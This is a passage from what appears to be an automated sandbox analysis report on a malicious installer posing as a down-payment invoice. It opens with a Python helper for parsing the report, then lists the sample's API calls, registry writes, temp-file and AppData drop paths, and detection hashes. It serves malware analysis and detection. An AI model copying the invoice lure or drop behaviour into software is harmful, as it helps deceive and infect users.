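            elif body.startswith("String ID: "):
                cur.strings.extend(body[len("String ID: "):].split("$"))
    return entries

# Subsets of the Windows SDK flag definitions, lowest bit first.
LOAD_LIBRARY_FLAGS = [(0x1, "DONT_RESOLVE_DLL_REFERENCES"), (0x2, "LOAD_LIBRARY_AS_DATAFILE"),
                      (0x8, "LOAD_WITH_ALTERED_SEARCH_PATH"), (0x800, "LOAD_LIBRARY_SEARCH_SYSTEM32")]
SECURITY_INFORMATION = [(0x1, "OWNER_SECURITY_INFORMATION"), (0x2, "GROUP_SECURITY_INFORMATION"),
                        (0x4, "DACL_SECURITY_INFORMATION"), (0x8, "SACL_SECURITY_INFORMATION"),
                        (0x80000000, "PROTECTED_DACL_SECURITY_INFORMATION")]
# 0-based argument index that carries a flag word for each call, and the table that decodes it.
FLAG_ARGS = {"LoadLibraryExW": (2, LOAD_LIBRARY_FLAGS), "SetFileSecurityW": (1, SECURITY_INFORMATION)}

def decode_flags(value, table):
    # Names of the set bits in table order; bits the table does not know are kept as hex.
    names, rest = [], value
    for bit, name in table:
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names

def constant_findings(entries):
    out = []
    for call in (c for e in entries for c in e.apis if c.name in FLAG_ARGS):
        idx, table = FLAG_ARGS[call.name]
        if idx < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]{1,8}", call.args[idx]):
            out.append((f"{call.ref:08X}", call.name, decode_flags(int(call.args[idx], 16), table)))
    return out

def file_paths(entries):
    found = set()
    for e in entries:
        for text in e.strings + [a for c in e.apis for a in c.args]:
            found.update(PATH_RE.findall(text))
    return found
```

Run parse_entries over the text of a whole report section rather than SAMPLE to get every function's paths and decoded constants; FLAG_ARGS is the place to add further calls (CreateFileW access masks, VirtualAlloc protections) once their argument positions are known.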

Control-flow Graph

(graph image not reproduced; basic blocks 405f0d-405f5f, calling GetTickCount and GetTempFileNameW)
APIs
• GetTickCount.KERNEL32 ref: 00405F2B
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF), ref: 00405F46
Strings
• "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 00405F0D
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16
• nsa, xrefs: 00405F1A
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-2701785022
• Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
• Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
• Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
• Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image not reproduced; basic blocks 6f1d177b-6f1d18dc, calling GlobalFree, FreeLibrary and internal subroutines)
APIs
  • Part of subcall function 6F1D1B63: GlobalFree.KERNEL32(?), ref: 6F1D1DB6
  • Part of subcall function 6F1D1B63: GlobalFree.KERNEL32(?), ref: 6F1D1DBB
  • Part of subcall function 6F1D1B63: GlobalFree.KERNEL32(?), ref: 6F1D1DC0
• GlobalFree.KERNEL32(00000000), ref: 6F1D1829
• FreeLibrary.KERNEL32(?), ref: 6F1D18AF
• GlobalFree.KERNEL32(00000000), ref: 6F1D18D4
  • Part of subcall function 6F1D2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6F1D2387
  • Part of subcall function 6F1D2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F1D17FA,00000000), ref: 6F1D27F8
  • Part of subcall function 6F1D15C6: lstrcpyW.KERNEL32(?,6F1D4020), ref: 6F1D15DC
Strings
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
• Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Global$Free$Alloc$Librarylstrcpy
• String ID:
• API String ID: 1791698881-3916222277
• Opcode ID: 4a4177f0cfd93771cde9571277633078264a90cd98c48bbc9c9ceb04e0b4c611
• Instruction ID: 8f6184b1751bc6f8464962a3906593b7d55529d2b80af17ada2b9fd2c8434474
• Opcode Fuzzy Hash: 4a4177f0cfd93771cde9571277633078264a90cd98c48bbc9c9ceb04e0b4c611
• Instruction Fuzzy Hash: AE41C2714003459AEF00DF35D984BC637B8BF163E5F044566F96ABA0C6DB79A0A4CB60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image not reproduced; basic blocks 402032-4020ff plus shared exit blocks 40288b-402892 and 402ac5-402ad4, calling GetModuleHandleW, LoadLibraryExW, FreeLibrary and internal subroutines)
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
• LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID: xWi
• API String ID: 334405425-1681388181
• Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
• Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
• Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
• Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks (node id: address range, calls made):
• 1075: 4023e4-402415, call 402c41 * 2, call 402cd1
• 1082: 402ac5-402ad4
• 1083: 40241b-402425
• 1085: 402427-402434, call 402c41, lstrlenW
• 1086: 402438-40243b
• 1087: 40243d-40244e, call 402c1f
• 1088: 40244f-402452
• 1092: 402463-402477, RegSetValueExW
• 1093: 402454-40245e, call 4031d6
• 1097: 402479
• 1098: 40247c-40255d, RegCloseKey
• 1100: 40288b-402892
Edges:
• 1075->1082, 1075->1083
• 1083->1085, 1083->1086, 1085->1086
• 1086->1087, 1086->1088, 1087->1088
• 1088->1092, 1088->1093, 1093->1092
• 1092->1097, 1092->1098, 1097->1098
• 1098->1082, 1098->1100, 1100->1082
APIs
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000023,00000011,00000002), ref: 0040242F
• RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 0040246F
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 00402557
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nskD796.tmp
• API String ID: 2655323295-1777428270
• Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
• Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
• Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
• Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalFree.KERNEL32(00695778), ref: 00401BE7
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: Call$xWi
• API String ID: 3394109436-2015566773
• Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
• Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
• Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
• Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Close$Enum
• String ID:
• API String ID: 464197530-0
• Opcode ID: 52473162f27408a13de1c9895957726086a9f0b93d5d7a53d963e96a44f2b4b1
• Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
• Opcode Fuzzy Hash: 52473162f27408a13de1c9895957726086a9f0b93d5d7a53d963e96a44f2b4b1
• Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405D76
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences,?,00000000,000000F0), ref: 0040164D
Strings
• C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences, xrefs: 00401640
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences
• API String ID: 1892508949-79196314
• Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
• Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
• Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
• Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                                                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
